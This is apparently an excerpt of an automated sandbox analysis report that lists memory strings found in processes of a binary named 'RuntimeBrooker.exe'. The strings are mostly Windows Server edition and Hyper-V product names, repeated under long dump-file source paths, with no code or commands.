Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Hyper-V (guest)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: RuntimeBrooker.exe, 00000015.00000002.1495085638.000002899D150000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\|
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Hyper-V
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: RuntimeBrooker.exe, 00000007.00000002.1327055303.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1360002137.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393770619.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1425421980.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1485129643.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524530712.0000000000E74000.00000040.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1559364469.0000000000E74000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
